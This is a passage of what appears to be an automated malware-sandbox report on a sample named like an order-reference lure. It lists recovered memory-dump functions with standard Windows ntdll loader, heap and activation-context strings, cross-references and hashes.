                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-2160512332
                                                                                            • Opcode ID: 14a836881f8b090d09a48607ad6aa5d7e5cdb5c791c2db647cafb8c7289ba40c
                                                                                            • Instruction ID: 206f3d79f1f89dffcb43c06b9708f7d851c775cd21a2bdc2996892bd2f77d5b5
                                                                                            • Opcode Fuzzy Hash: 14a836881f8b090d09a48607ad6aa5d7e5cdb5c791c2db647cafb8c7289ba40c
                                                                                            • Instruction Fuzzy Hash: FB929071608342AFE721EF19C880F6BBBE8BB84754F04492DFA99D7290D774E944CB52
                                                                                            Function 01938620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • 8, xrefs: 019752E3
                                                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754E2
                                                                                            • undeleted critical section in freed memory, xrefs: 0197542B
                                                                                            • double initialized or corrupted critical section, xrefs: 01975508
                                                                                            • Critical section address., xrefs: 01975502
                                                                                            • Critical section debug info address, xrefs: 0197541F, 0197552E
                                                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0197540A, 01975496, 01975519
                                                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 019754CE
                                                                                            • Critical section address, xrefs: 01975425, 019754BC, 01975534
                                                                                            • Invalid debug info address of this critical section, xrefs: 019754B6
                                                                                            • Address of the debug info found in the active list., xrefs: 019754AE, 019754FA
                                                                                            • Thread identifier, xrefs: 0197553A
                                                                                            • corrupted critical section, xrefs: 019754C2
                                                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 01975543
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                            • API String ID: 0-2368682639
                                                                                            • Opcode ID: ef7392d864993173cac63898f455f3b2f4371b7dde20ada268f44aaae9c7f426
                                                                                            • Instruction ID: 5b9f56dd1f4c21e262cdca9f6711748108fcb2d30180e6669f7b3a3fd131ba68
                                                                                            • Opcode Fuzzy Hash: ef7392d864993173cac63898f455f3b2f4371b7dde20ada268f44aaae9c7f426
                                                                                            • Instruction Fuzzy Hash: E0817B71A00358EBEB60CF99C884FAEBBF9AF49704F154119F508F7290D375AA41CB60
                                                                                            Function 019329F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 019722E4
                                                                                            • RtlpResolveAssemblyStorageMapEntry, xrefs: 0197261F
                                                                                            • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01972498
                                                                                            • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01972624
                                                                                            • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 019724C0
                                                                                            • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01972412
                                                                                            • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01972506
                                                                                            • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01972409
                                                                                            • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01972602
                                                                                            • @, xrefs: 0197259B
                                                                                            • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 019725EB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                            • API String ID: 0-4009184096
                                                                                            • Opcode ID: d796c871fe6ebd53ffb3a963a829334dc542ab328431c9b75bc02a3849aa3742
                                                                                            • Instruction ID: cbc630ef72e2c4b7aaa47b7823f5f3165d1b8964fd11654eed309a4c1c626b6d
                                                                                            • Opcode Fuzzy Hash: d796c871fe6ebd53ffb3a963a829334dc542ab328431c9b75bc02a3849aa3742
                                                                                            • Instruction Fuzzy Hash: 7E026FF1D042299BDB31DB54CC80B9AB7B8AF95714F0045EAE60DA7241EB30AF84CF59
                                                                                            Function 019A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                            • API String ID: 0-2515994595
                                                                                            • Opcode ID: 5595f0cc6562a6b4e0c5da607cdd04bbdb936f9ebcb6ed48086f9dd677bd9f00
                                                                                            • Instruction ID: f0e05764dc94dfd3770350017223649544843854fc45b8f565f6430b1ae01d63
                                                                                            • Opcode Fuzzy Hash: 5595f0cc6562a6b4e0c5da607cdd04bbdb936f9ebcb6ed48086f9dd677bd9f00
                                                                                            • Instruction Fuzzy Hash: 3351BDB19043159BD329DF188844BABBBECEF94356F94492DAA9DC3240E774D608CBD2
                                                                                            Function 019B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                            • API String ID: 0-1700792311
                                                                                            • Opcode ID: 7c1bfe039f67206d57e1041225673e2bdb21fc79623bcc166d1b7734002f52c5
                                                                                            • Instruction ID: c8a7523742755437f2f28a55366a82144f67066d28776606ed108022af270ebf
                                                                                            • Opcode Fuzzy Hash: 7c1bfe039f67206d57e1041225673e2bdb21fc79623bcc166d1b7734002f52c5
                                                                                            • Instruction Fuzzy Hash: A8D1ED31600686EFDB22DF68C580AEEBBF6FF49710F18805DF5499B652D7389A81CB10
                                                                                            Function 019889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • VerifierDebug, xrefs: 01988CA5
                                                                                            • VerifierFlags, xrefs: 01988C50
                                                                                            • AVRF: -*- final list of providers -*- , xrefs: 01988B8F
                                                                                            • VerifierDlls, xrefs: 01988CBD
                                                                                            • HandleTraces, xrefs: 01988C8F
                                                                                            • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01988A3D
                                                                                            • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01988A67
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                            • API String ID: 0-3223716464
                                                                                            • Opcode ID: 67dae82990dfe623b3fa8a9726fad5d91300e74eccf36550a6e51de1cfdd0989
                                                                                            • Instruction ID: d47328afef519ec3c6066b59458016bdadd08b6031b2fc0b311a88c69b49bbbc
                                                                                            • Opcode Fuzzy Hash: 67dae82990dfe623b3fa8a9726fad5d91300e74eccf36550a6e51de1cfdd0989
                                                                                            • Instruction Fuzzy Hash: CF912671A45702AFE321FF288880F6A7BE8ABD4714F45051CFA4CAB295D730DD05C7A5
                                                                                            Function 0190EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                            • API String ID: 0-1109411897
                                                                                            • Opcode ID: 2a7200cd226444b508ef3d16e18b9283f88b34a2a2c069e730e63acbf2ad5b83
                                                                                            • Instruction ID: afc1232fd6ffd5dd6c86d0c6cd7eba848f750baef4b96aa61e6178a937077264
                                                                                            • Opcode Fuzzy Hash: 2a7200cd226444b508ef3d16e18b9283f88b34a2a2c069e730e63acbf2ad5b83
                                                                                            • Instruction Fuzzy Hash: 49A24970A0562A8FDB75CF58CD88BA9BBB9BF45705F1446E9D90DA7290DB309E80CF10
                                                                                            Function 019363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-792281065
                                                                                            • Opcode ID: 3bb0545e4a0d05c297e9a61aa9b20f7d753de4898e3ef62636b8dec66f9cbd78
                                                                                            • Instruction ID: 10245fa341667ec717faf7c4a74911232ef3be031d5c9f2a2d4575811c58bc95
                                                                                            • Opcode Fuzzy Hash: 3bb0545e4a0d05c297e9a61aa9b20f7d753de4898e3ef62636b8dec66f9cbd78
                                                                                            • Instruction Fuzzy Hash: A1913870F05315BBEB35EF18E848BAA7BA5BFD1B24F14012CE90C6B282DB749941C791
                                                                                            Function 018F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • LdrpInitShimEngine, xrefs: 019599F4, 01959A07, 01959A30
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01959A11, 01959A3A
                                                                                            • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01959A2A
                                                                                            • apphelp.dll, xrefs: 018F6496
                                                                                            • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 019599ED
                                                                                            • Getting the shim user exports failed with status 0x%08lx, xrefs: 01959A01
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-204845295
                                                                                            • Opcode ID: 5ccf194c0579d02af802fedf4a2ba3b6d0654b63df16094c6a4e68eecaac407d
                                                                                            • Instruction ID: e1eaf1049a85c6801896264774070003c5a30fa60b2dba7f474f1cc0dcee71d4
                                                                                            • Opcode Fuzzy Hash: 5ccf194c0579d02af802fedf4a2ba3b6d0654b63df16094c6a4e68eecaac407d
                                                                                            • Instruction Fuzzy Hash: 54518071208305EFE725DF24D985B5B77E9FB84748F10091DFA89A7250E730EA44CBA2
                                                                                            Function 0193C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01978181, 019781F5
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0193C6C3
                                                                                            • LdrpInitializeImportRedirection, xrefs: 01978177, 019781EB
                                                                                            • Unable to build import redirection Table, Status = 0x%x, xrefs: 019781E5
                                                                                            • Loading import redirection DLL: '%wZ', xrefs: 01978170
                                                                                            • LdrpInitializeProcess, xrefs: 0193C6C4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                            • API String ID: 0-475462383
                                                                                            • Opcode ID: 9968a74a90e2e507ae47a2f8fd461d14a9426b905b45a003f9f28f9c66df4a80
                                                                                            • Instruction ID: 850dedf0100421dbf2964605e35d74f26d496453121060d25b30d5be29325830
                                                                                            • Opcode Fuzzy Hash: 9968a74a90e2e507ae47a2f8fd461d14a9426b905b45a003f9f28f9c66df4a80
                                                                                            • Instruction Fuzzy Hash: AD310771748706ABC214EF29DC8AE1A77E4FFD4B14F04055CF949AB391EA24ED04C7A2
                                                                                            Function 01932674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlGetAssemblyStorageRoot, xrefs: 01972160, 0197219A, 019721BA
                                                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0197219F
                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01972178
                                                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01972180
                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 019721BF
                                                                                            • SXS: %s() passed the empty activation context, xrefs: 01972165
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                            • API String ID: 0-861424205
                                                                                            • Opcode ID: d8f96ddb34a78ce8c6e04d422c53454aee73f0311479ad1ca222a0fe2ac0b84c
                                                                                            • Instruction ID: 33b329cf4187522d4fa73aa2d7620fbdc48ddf0f4eedd1ec7645f654863040ea
                                                                                            • Opcode Fuzzy Hash: d8f96ddb34a78ce8c6e04d422c53454aee73f0311479ad1ca222a0fe2ac0b84c
                                                                                            • Instruction Fuzzy Hash: F031E636B402257BE7229B999C85F5A7BB8FFE5B90F050059FB0DA7240D270AB00C7E1
                                                                                            Function 0194096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 01942DF0: LdrInitializeThunk.NTDLL ref: 01942DFA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BA3
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940BB6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D60
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01940D74
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1404860816-0
                                                                                            • Opcode ID: de1a1a5018d1c1e22b8517eb059bfc62007fdc64a2dce3f20e76c1bfc470e450
                                                                                            • Instruction ID: 8e90210befef8a2ee5e442880e3eb6b07959b2889990fef6d864c9ad9e692405
                                                                                            • Opcode Fuzzy Hash: de1a1a5018d1c1e22b8517eb059bfc62007fdc64a2dce3f20e76c1bfc470e450
                                                                                            • Instruction Fuzzy Hash: 24423875900715DFDB21CF68C880BAAB7F9FF44314F1445A9EA8DAB241E770AA84CF61
                                                                                            Function 0190A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                            • API String ID: 0-379654539
                                                                                            • Opcode ID: fe7d07beef7462fca42b8e41393ec84dd5ef29b090696cf857fde7243ec2bf37
                                                                                            • Instruction ID: 777117859cf992ccf251473d72037874bcef7a1544d4568abed5eea6c551410b
                                                                                            • Opcode Fuzzy Hash: fe7d07beef7462fca42b8e41393ec84dd5ef29b090696cf857fde7243ec2bf37
                                                                                            • Instruction Fuzzy Hash: 45C19075508386CFD712CF58C440B6AB7E8FF84704F044969F999CB291E739C949CBA2
                                                                                            Function 01938402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 01938421
                                                                                            • @, xrefs: 01938591
                                                                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0193855E
                                                                                            • LdrpInitializeProcess, xrefs: 01938422
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-1918872054
                                                                                            • Opcode ID: cf26d6177e6a34811b10f5a61cd0376a3edfddf67d083dd45612bbfbc692815a
                                                                                            • Instruction ID: bf321a0c0b9e170508b3a8bf08e3e4de3f1e71a6fffd61ed9b7a09d7b33d195b
                                                                                            • Opcode Fuzzy Hash: cf26d6177e6a34811b10f5a61cd0376a3edfddf67d083dd45612bbfbc692815a
                                                                                            • Instruction Fuzzy Hash: 67918C71648345AFE722DF65DC40EABBBECBFC4744F40092EFA8892151E734DA448B62
                                                                                            Function 0193273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 019721D9, 019722B1
                                                                                            • .Local, xrefs: 019328D8
                                                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 019722B6
                                                                                            • SXS: %s() passed the empty activation context, xrefs: 019721DE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                            • API String ID: 0-1239276146
                                                                                            • Opcode ID: 890646c30becdb042487539625fc4e0bbae51a2a549ddd04a2682086169f511d
                                                                                            • Instruction ID: 6eda3f50e0100ad17dc1670c8493c559ac924bd9d5b75958e260fa37a41edf81
                                                                                            • Opcode Fuzzy Hash: 890646c30becdb042487539625fc4e0bbae51a2a549ddd04a2682086169f511d
                                                                                            • Instruction Fuzzy Hash: 1BA1BF35900229DBDB25CF68D888BA9B7B5BF98314F2545E9D90CAB251D730EE81CF90
                                                                                            Function 01934AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • RtlDeactivateActivationContext, xrefs: 01973425, 01973432, 01973451
                                                                                            • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01973437
                                                                                            • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01973456
                                                                                            • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0197342A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                            • API String ID: 0-1245972979
                                                                                            • Opcode ID: 0caf2baed8d42535102ced0820b5af67dcd559c3f44826c8eeba8d6725cd27bb
                                                                                            • Instruction ID: 0048d7d03568361f33247182d40b88825cf399d2beabd6e97f44b27eb48080c9
                                                                                            • Opcode Fuzzy Hash: 0caf2baed8d42535102ced0820b5af67dcd559c3f44826c8eeba8d6725cd27bb
                                                                                            • Instruction Fuzzy Hash: 876103366407129BD726CF1DC881F2AB7E9FFC0B51F158529E85D9B241DB34EA01CB91
                                                                                            Function 019064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01960FE5
                                                                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01961028
                                                                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 019610AE
                                                                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0196106B
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                            • API String ID: 0-1468400865
                                                                                            • Opcode ID: a588dc3e8de5b143f92a67168920c1cb6079bda78f0507a8be765b1fb7c3a669
                                                                                            • Instruction ID: fe11e73a932678577a4b6492b86d3b76160affa941b9bf67ead1a27cd537f55a
                                                                                            • Opcode Fuzzy Hash: a588dc3e8de5b143f92a67168920c1cb6079bda78f0507a8be765b1fb7c3a669
                                                                                            • Instruction Fuzzy Hash: 5371BEB19043459FCB22EF14C885F977FACAF95764F400468F94C8B286D735D588CBA1
                                                                                            Function 0192245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            • minkernel\ntdll\ldrinit.c, xrefs: 0196A9A2
                                                                                            • LdrpDynamicShimModule, xrefs: 0196A998
                                                                                            • apphelp.dll, xrefs: 01922462
                                                                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0196A992
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.2291248989.00000000018D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018D0000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_18d0000_ORDER REF 47896798 PSMCO.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                            • API String ID: 0-176724104
                                                                                            • Opcode ID: cc14b1c7a6aa7570d3432e98edf3302d37144789e371a8f415d441609135eedb
                                                                                            • Instruction ID: fd1ae472f8e294af80c0710fe4a183b892d9bf75511eefd8040adbe9cf67e299
                                                                                            • Opcode Fuzzy Hash: cc14b1c7a6aa7570d3432e98edf3302d37144789e371a8f415d441609135eedb
                                                                                            • Instruction Fuzzy Hash: A3315971600301BBDB31DF5DD885E6A77BDFB80B00F25001EE909B7245D7745A81CB91
